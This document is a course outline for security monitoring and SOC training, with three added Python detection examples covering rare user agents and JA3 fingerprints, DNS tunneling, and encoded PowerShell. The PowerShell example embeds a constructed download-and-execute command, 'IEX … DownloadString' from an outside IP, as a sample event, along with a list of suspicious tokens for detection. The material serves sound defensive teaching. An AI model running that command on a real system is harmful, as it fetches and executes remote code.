Continuous Monitoring and Security Operations (CMSO)
Course Summary
Objectives
• Analyze modern hybrid enterprises for deficient protection/detection strategies
• Apply the principles learned in the course to design a defensible cloud, network, and endpoint security architecture and operations
• Understand the importance of detection-dominant security architecture and Security Operations Centers (SOC) for hybrid enterprises
• Identify the key components of cloud, network, and endpoint protection and monitoring across hybrid infrastructure
• Determine appropriate security monitoring needs for organizations of all sizes
Outline
Current State Assessment and Security Architecture
Exercises
o Detecting Traditional Attack Techniques with Security Onion and CyberChef
o Detecting Modern Attack Techniques with Security Onion
o Egress Analysis with Elastic Stack
o NetWars (Day 1): Immersive Cyber Challenges
Topics
o Traditional Security Architecture
• Perimeter-focused
• Addressed Layer 3/4
• Centralized Information Systems
• Prevention-Oriented
• Device-driven
• Traditional Attack Techniques
o Introducing Security Onion 2.X
• Alerts Menu
• Pivoting to the Hunt Menu
• The PCAP Menu
o Modern Security Architecture Principles
• Detection-oriented
• Post-Exploitation-focused
• Decentralized Information Systems/Data
• Risk-informed
• Layer 7 Aware
• Security Operations Centers
• Network Security Monitoring
• Continuous Security Monitoring
• Modern Attack Techniques
• Adversarial Dominance
• MITRE ATT&CK(R)
o Security Architecture - Key Techniques/Practices
• Threat Vector Analysis
• Data Exfiltration Analysis
• Detection Dominant Design
• Intrusion Kill Chain
• Visibility Analysis
• Lateral Movement Analysis
• Data Ingress/Egress Mapping
• Internal Segmentation
• Network Security Monitoring
• Continuous Security Monitoring
o Cloud Deployment Models
• Cloud Shared Responsibilities
• Infrastructure as Code (IaC)
• Overexposed Cloud Services: Leaky Buckets
• Cloud Network Visibility
o MITRE ATT&CK(R) & AWS Security Stack
• AWS Security Hub
• AWS Identity and Access Management (IAM)
• AWS CloudTrail
• Amazon CloudWatch
• AWS Firewall Manager
• AWS WAF + AWS Shield
• Amazon Virtual Private Cloud (VPC)
• Amazon GuardDuty
• Amazon Inspector
• Amazon Macie
Network Security Architecture
Exercises
o ModSecurity
o Decrypting TLS with Wireshark
o Detecting Adversaries with Protocol Inspection
o HoneyTokens for Leak Detection
o NetWars (Day 2): Immersive Cyber Challenges
Topics
o SOCs/Security Architecture - Key Infrastructure Devices
• Traditional and Next-Generation Firewalls, and NIPS
• Web Application Firewall
• Malware Detonation Devices
• HTTP Proxies, Web Content Filtering, and SSL/TLS Decryption
• SIEMs, NIDS, Packet Captures, and DLP
• Honeypots/Honeynets
• Network Infrastructure - Routers, Switches, DHCP, DNS
• Threat Intelligence
o Segmented Internal Networks
• Routers
• Internal SI Firewalls
• VLANs
• Detecting the Pivot
• DNS architecture
• Encrypted DNS including DNS over HTTPS (DoH) and DNS over TLS (DoT)
o Defensible Network Security Architecture Principles Applied
• Internal Segmentation
• Threat Vector Analysis
• Data Exfiltration Analysis
• Detection Dominant Design
• Zero Trust Architecture (Kindervag)
• Intrusion Kill Chain
• Visibility Analysis
• Data Visualization
• Lateral Movement Analysis
• Data Ingress/Egress Mapping
Network Security Monitoring
Exercises
o Pcap Carving with Zeek
o Security Onion Service-Side Attack Analysis
o Wireshark Merlin Analysis
o Detecting TLS Certificate and User-Agent Anomalies
o NetWars (Day 3): Immersive Cyber Challenges
Topics
o Evolution of NSM
o The NSM Toolbox
o NIDS Design
o Analysis Methodology
o Understanding Data Sources
• Full Packet Capture
• Extracted Data
• String Data
• Flow Data
• Transaction Data
• Statistical Data
• Alert Data
• Tagged Data
• Correlated Data
o Cloud NSM
o Practical NSM Issues
o Cornerstone NSM
• Service-Side and Client-Side Exploits
• Identifying High-Entropy Strings
• Tracking EXE Transfers
• Identifying Command and Control (C2) Traffic
• Tracking User Agents
• C2 via HTTPS
• Tracking Encryption Certificates
• Detecting Malware via JA3
o Detecting Cobalt Strike
• Criminal Usage of Cobalt Strike
• Malleable C2
• Cobalt Strike's X.509 Certificates
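The "Tracking User Agents", "Detecting Malware via JA3" and "Tracking Encryption Certificates" topics above are all instances of one technique: profile a field across the whole fleet and look at the rare values (long-tail analysis). The Python below is an added example written for this page, not SEC511 course material and not Zeek's own code. It assumes Zeek JSON-lines output with the standard http.log and ssl.log field names (`id.orig_h`, `user_agent`, `server_name`, `subject`, `issuer`) and a `ja3` field, which is only present when the JA3 package is loaded in Zeek; every record, host, hash and user agent is constructed for illustration.

```python
"""Long-tail (rarity) analysis over Zeek-style http.log and ssl.log records.

Added example for this page; not course material and not Zeek code. Every
record below is constructed (fabricated hosts, hashes and user agents).
"""
import json
from collections import defaultdict

CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  # odd on a current fleet
SCRIPT_UA = "python-requests/2.31.0"
COMMON_JA3 = "a" * 32  # placeholder fingerprints, not real JA3 values
RARE_JA3 = "b" * 32


def _http(host, server, ua):
    return json.dumps({"id.orig_h": host, "host": server, "user_agent": ua})


def _ssl(host, sni, ja3, subject, issuer):
    return json.dumps({"id.orig_h": host, "server_name": sni, "ja3": ja3,
                       "subject": subject, "issuer": issuer})


# Constructed Zeek JSON lines: four workstations share one browser profile,
# one host (10.0.0.23) talks to a bare IP with a legacy UA, one host runs a script.
HTTP_LOG = "\n".join([
    _http("10.0.0.11", "www.example.com", CHROME_UA),
    _http("10.0.0.12", "www.example.com", CHROME_UA),
    _http("10.0.0.13", "cdn.example.net", CHROME_UA),
    _http("10.0.0.11", "cdn.example.net", CHROME_UA),
    _http("10.0.0.14", "www.example.com", CHROME_UA),
    _http("10.0.0.23", "203.0.113.50", LEGACY_UA),
    _http("10.0.0.23", "203.0.113.50", LEGACY_UA),
    _http("10.0.0.17", "updates.example.org", SCRIPT_UA),
])

SSL_LOG = "\n".join([
    _ssl("10.0.0.11", "www.example.com", COMMON_JA3, "CN=www.example.com", "CN=Example Public CA"),
    _ssl("10.0.0.12", "www.example.com", COMMON_JA3, "CN=www.example.com", "CN=Example Public CA"),
    _ssl("10.0.0.14", "mail.example.com", COMMON_JA3, "CN=mail.example.com", "CN=Example Public CA"),
    _ssl("10.0.0.23", "203.0.113.50", RARE_JA3, "CN=localhost", "CN=localhost"),
])


def parse_zeek_json(text):
    """Parse Zeek JSON-lines output (one record per line)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def long_tail(records, field, host_field="id.orig_h", max_hosts=1):
    """Values of `field` seen from at most `max_hosts` distinct sources, rarest first.

    Counting distinct sources rather than raw hits keeps one chatty beacon
    from looking 'common' just because it fires every minute.
    """
    hosts, counts = defaultdict(set), defaultdict(int)
    for r in records:
        value = r.get(field)
        if value is None:
            continue
        hosts[value].add(r[host_field])
        counts[value] += 1
    tail = {v: {"count": counts[v], "hosts": sorted(h)}
            for v, h in hosts.items() if len(h) <= max_hosts}
    return dict(sorted(tail.items(), key=lambda kv: (kv[1]["count"], kv[0])))


def rare_user_agents():
    return long_tail(parse_zeek_json(HTTP_LOG), "user_agent")


def rare_ja3():
    return long_tail(parse_zeek_json(SSL_LOG), "ja3")


def self_signed_certs(records):
    """(client, SNI, subject) for sessions whose leaf certificate subject equals its issuer."""
    return [(r["id.orig_h"], r.get("server_name"), r["subject"])
            for r in records if r.get("subject") and r["subject"] == r.get("issuer")]


if __name__ == "__main__":
    for ua, info in rare_user_agents().items():
        print(f"rare UA {ua!r}: {info['count']} hits from {info['hosts']}")
    for ja3, info in rare_ja3().items():
        print(f"rare JA3 {ja3}: {info['count']} sessions from {info['hosts']}")
    for client, sni, subject in self_signed_certs(parse_zeek_json(SSL_LOG)):
        print(f"self-signed cert {subject!r} presented to {client} (SNI {sni})")
```

On a real dataset the threshold is the tuning knob: `max_hosts=1` on a fleet of thousands surfaces the genuinely unique, while a handful of hosts sharing an unusual JA3 is often the more interesting cluster.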
Endpoint Security Architecture
Exercises
o Sysmon
o Autoruns
o Application Control with AppLocker
o Merlin Sysmon Analysis
o NetWars Day 4: Immersive Cyber Challenges
Topics
o Endpoint Security Architecture
• Endpoint Protection Platforms
• Endpoint Detection and Response
• Authentication Protection/Detection
• Configuration Management/Monitoring
o Endpoint Protection
• TPM: Device Health Attestation
• Host-based Firewall, Host-based IDS/IPS
• Application Control, Application Virtualization
• Virtualization Based Security
• Microsoft Defender: Application Guard
• Windows Defender: Credential Guard
• Defender for Endpoint: Attack Surface Reduction
• EMET and Defender Exploit Guard
o Cloud Configuration Management
o Endpoint Detection - Sysmon
• FileDelete, ProcessTampering, and other recent additions
• IMPHASH
• DeepBlueHash
o Authentication Protection and Detection
• Privileged Account Monitoring
• Windows Hello
• Dynamic Lock
• PIN-Only Authentication
• Passwordless
• Azure Active Directory + MFA
• Azure Authentication Methods
• AAD Conditional Access
• Hash/Ticket/Token Attacks
o Configuration Management/Monitoring
• Cloud: Center for Internet Security (CIS) Hardened Images
• Containers: CIS Hardened Images for Containers
• Baseline Monitoring
• Desired State Configuration (DSC)
• Azure Automation State Configuration
Automation and Continuous Security Monitoring
Exercises
o Inventory
o Windows Event Logs
o DNS over HTTPS (DoH)
o Kansa Persistence and Pivoting
o NetWars (Day 5): Immersive Cyber Challenges
Topics
o Overview
• Continuous Security Monitoring (CSM) vs. Continuous Diagnostics and Mitigation (CDM) vs. Information Security Continuous Monitoring (ISCM)
• Cyberscope and SCAP
o Industry Best Practices
• Continuous Monitoring and the 20 CIS Critical Security Controls
• Australian Signals Directorate (ASD) Strategies to Mitigate Targeted Cyber Intrusions
o Winning CSM Techniques
• Long Tail Analysis
• Australian Signals Directorate (ASD) Strategies to Mitigate Cyber Security Incidents
• The ASD Essential Eight
o Maintaining Situational Awareness
o Host, Port, and Service Discovery
o Vulnerability Scanning
o Monitoring Patching
o Monitoring Applications
o Monitoring Service Logs
• Detecting Malware via DNS logs
• Detecting DNS Tunneling via Iodine and dnscat2
• Domain_stats and Registration Data Access Protocol (RDAP)
o Monitoring Change to Devices and Appliances
o Leveraging Proxy and Firewall Data
o Configuring Centralized Windows Event Log Collection
o Monitoring Critical Windows Events
• Hands-on: Detecting Malware via Windows Event Logs
o Scripting and Automation
• Importance of Automation
• PowerShell
• DeepBlueCLI
o Security Operations Center (SOC)
• Purpose of a SOC
• Key SOC roles
• Relationship to Defensible Security Architecture
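The "Detecting DNS Tunneling via Iodine and dnscat2" and "Detecting Malware via DNS logs" topics above, together with the NSM topic "Identifying High-Entropy Strings", come down to profiling query names per domain. The Python below is an added example for this page, not course material and not code from Zeek, iodine or dnscat2. It assumes Zeek dns.log JSON records with the `id.orig_h`, `query` and `qtype_name` fields, treats the last two labels as the registered domain (a simplification that misfires for suffixes like `co.uk`; use a public-suffix list in production), and flags domains whose subdomains are numerous, long and high-entropy or whose queries are dominated by the TXT, NULL, CNAME and MX types tunnels lean on. All records are constructed; the `*.tunnel.test` names imitate tunnel client output.

```python
"""Heuristic DNS-tunnel detection over Zeek-style dns.log records.

Added example for this page (not course material; not Zeek, iodine or
dnscat2 code). Records are constructed; `.test` is a reserved TLD.
"""
import json
import math
from collections import Counter, defaultdict

# Five constructed tunnel labels: 32 characters, all distinct, so each has
# exactly 5.0 bits of Shannon entropy per character.
TUNNEL_LABELS = [
    "k3q7xm2pwz9cvh5rtn8bjy4ldf6ga0su",
    "v8ndq2xkp4jyw7tmz1frc5hlb9ga3s0e",
    "p2hw9kxq6tnv4zdm7bjr1ly5fc8gs3a0",
    "z5tq1mxw8pnk3vhj7rbd2yl9cf4gs6a0",
    "r7kzx3qmw1pvn5thj9bdy2lc8fg4sa6e",
]

# Query types tunnels commonly use (iodine defaults to NULL; dnscat2 uses TXT/CNAME/MX).
TUNNEL_QTYPES = {"TXT", "NULL", "CNAME", "MX"}


def _rec(host, query, qtype):
    return json.dumps({"id.orig_h": host, "query": query, "qtype_name": qtype})


DNS_LOG = "\n".join(
    [
        _rec("10.0.0.11", "www.example.com", "A"),
        _rec("10.0.0.12", "mail.example.com", "A"),
        _rec("10.0.0.11", "login.example.com", "A"),
        _rec("10.0.0.13", "cdn.example.com", "A"),
        _rec("10.0.0.12", "_dmarc.example.com", "TXT"),  # one legitimate TXT lookup
    ]
    + [_rec("10.0.0.23", f"{label}.tunnel.test", "TXT") for label in TUNNEL_LABELS]
)


def shannon_entropy(s):
    """Bits per character; 0.0 for the empty string or a single repeated character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_query(qname):
    """(registered domain, subdomain) using a last-two-labels heuristic (assumption)."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_domains(records):
    """Per-domain counts, subdomain length/entropy means and tunnel-type query ratio."""
    acc = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0.0, "ent": 0.0,
                               "odd": 0, "hosts": set()})
    for r in records:
        dom, sub = split_query(r["query"])
        a = acc[dom]
        a["n"] += 1
        a["hosts"].add(r["id.orig_h"])
        if sub:
            a["subs"].add(sub)
        a["len"] += len(sub)
        a["ent"] += shannon_entropy(sub)
        if r.get("qtype_name") in TUNNEL_QTYPES:
            a["odd"] += 1
    return {dom: {"queries": a["n"], "unique_subdomains": len(a["subs"]),
                  "mean_sub_len": a["len"] / a["n"], "mean_sub_entropy": a["ent"] / a["n"],
                  "odd_qtype_ratio": a["odd"] / a["n"], "hosts": sorted(a["hosts"])}
            for dom, a in acc.items()}


def tunnel_candidates(profiles, min_unique=5, min_len=20, min_entropy=3.5, min_odd_ratio=0.5):
    """Domains matching either the 'many long random subdomains' or the 'odd qtype' pattern."""
    flagged = {}
    for dom, p in profiles.items():
        reasons = []
        if (p["unique_subdomains"] >= min_unique and p["mean_sub_len"] >= min_len
                and p["mean_sub_entropy"] >= min_entropy):
            reasons.append("many long high-entropy subdomains")
        if p["queries"] >= min_unique and p["odd_qtype_ratio"] >= min_odd_ratio:
            reasons.append("dominated by TXT/NULL/CNAME/MX queries")
        if reasons:
            flagged[dom] = reasons
    return flagged


def analyze(text=DNS_LOG):
    records = [json.loads(line) for line in text.splitlines() if line.strip()]
    return tunnel_candidates(profile_domains(records))


if __name__ == "__main__":
    for dom, reasons in analyze().items():
        print(f"{dom}: {', '.join(reasons)}")
```

The single `_dmarc` TXT lookup under example.com is deliberately included: one odd query type is normal, a domain where most queries are TXT from one client is not, which is why the ratio check also requires a minimum query count.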
Capstone: Design, Detect, Defend
Topics
o Security Architecture
o Continuous Security Monitoring
o Applied NSM and CSM
o Analyzing Malicious Traffic with Security Onion, Wireshark, and CyberChef
o Analyzing Malicious Windows Event Logs
o Packet Analysis
o Log Analysis
o C2 Detection
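The capstone's "Analyzing Malicious Windows Event Logs" and the Day 5 "Detecting Malware via Windows Event Logs" and DeepBlueCLI topics share one workhorse check: pulling apart process-creation command lines, in particular encoded PowerShell. The Python below is an added example for this page; it is not DeepBlueCLI and not course material. It assumes Windows Security event 4688 records with command-line auditing enabled (otherwise `CommandLine` is empty) and models them as dicts; the events, the hostnames and the payload pointing at 203.0.113.50 (a documentation address range) are constructed.

```python
"""Flag suspicious process-creation events, including encoded PowerShell.

Added example for this page; not DeepBlueCLI and not course material.
Events are constructed dicts shaped like Windows Security 4688 records with
command-line auditing enabled (an assumption about the audit policy).
"""
import base64
import re

# Constructed payload; the encoded form is built the way PowerShell expects it
# (base64 over UTF-16LE), so the sample event is realistic without hand-typing it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.50/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"EventID": 4688, "Computer": "WS01",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"EventID": 4688, "Computer": "WS02",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"EventID": 4688, "Computer": "WS02",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")

SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                     "frombase64string", "-w hidden", "-windowstyle hidden",
                     "-nop", "-noprofile")


def split_encoded(cmdline):
    """Return (command line with the base64 blob removed, decoded text), or (cmdline, None)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # not base64, or not UTF-16LE text
        return cmdline, None
    return cmdline[:m.start(1)] + cmdline[m.end(1):], decoded


def inspect_event(event):
    """Reasons to look at this event, plus the decoded payload if there was one."""
    cmd = event.get("CommandLine", "") or ""
    stripped, decoded = split_encoded(cmd)
    reasons = []
    if decoded is not None:
        reasons.append("encoded command (base64 UTF-16LE) decoded")
    # Scan the visible switches and the decoded script, never the raw base64,
    # so random base64 characters cannot produce false token hits.
    text = (stripped + " " + (decoded or "")).lower()
    reasons += [f"suspicious token: {tok}" for tok in SUSPICIOUS_TOKENS if tok in text]
    if len(cmd) > 500:
        reasons.append(f"long command line ({len(cmd)} chars)")
    return reasons, decoded


def analyze_events(events):
    findings = []
    for i, ev in enumerate(events):
        if ev.get("EventID") != 4688:
            continue
        reasons, decoded = inspect_event(ev)
        if reasons:
            findings.append({"index": i, "Computer": ev.get("Computer"),
                             "CommandLine": ev.get("CommandLine"),
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f['Computer']}] {f['CommandLine'][:60]}...")
        for r in f["reasons"]:
            print("   -", r)
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

The `-ExecutionPolicy Bypass -File ...` event is left unflagged on purpose: it is common in legitimate administration, and treating it as an alert on its own buries the encoded-command hit in noise. Sysmon Event ID 1 carries the same `CommandLine` field and can be fed to the same function.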